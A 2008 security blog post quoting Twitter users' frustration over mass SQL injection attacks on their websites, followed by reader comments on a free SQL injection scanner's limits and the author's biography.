Tuesday, June 24, 2008

Twitters users angry about SQL Injection hacks on their websites

The mass SQL injection attacks have impacted the lives of a lot of Twitter users out there. I did a search for “SQL Injection” and the results are page after page of misery, time wasted cleaning things up, and cursing up a storm. You can really feel their pain and the worst is probably not yet over. Still gotta fix all that legacy code. Here are some of my favorites tweets…

shartley: Cleaning yet another SQL injection attack. I'm F'n sick of cleaning up after lazy programming that took place during my year away.

jamesTWIT: To the hacker who designed the SQL injection bot. I hope you die and not a fast death...something slow and painful. Like caught in a fire!

9 comments:

To all those angry twitter users: Find the SQL Injection before the bot finds it for you. Check out http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx

Odd, based on the licensing restrictions, Scrawl basically seems unusable. Maybe for like a REALLY small online store or something...

* Will only crawls up to 1500 pages * Does not support sites requiring authentication * Does not perform Blind SQL injection * Cannot retrieve database contents * Does not support JavaScript or flash parsing * Will not test forms for SQL Injection (POST Parameters)"

Oh I dunno about that, whoever developed this payload is definitely no noob. http://isc.sans.org/diary.html?storyid=4565

Payload aside, I was more talking about the 1,500 page count limit. Unless your vulnerable webapp is within those URLs, well, your outta luck I guess. And its tough to compete with the crawling capabilities of Google since that essentially what's being used for target list acquisition.

Don't get me wrong, I'm not saying you should be giving anything more away from free, it just is what it is.

About Me

Jeremiah Grossman's career spans nearly 20 years and has lived a literal lifetime in computer security to become one of the industry's biggest names. He has received a number of industry awards, been publicly thanked by Microsoft, Mozilla, Google, Facebook, and many others for his security research. Jeremiah has written hundreds of articles and white papers. As an industry veteran, he has been featured in hundreds of media outlets around the world. Jeremiah has been a guest speaker on six continents at hundreds of events including many top universities. All of this was after Jeremiah served as an information security officer at Yahoo!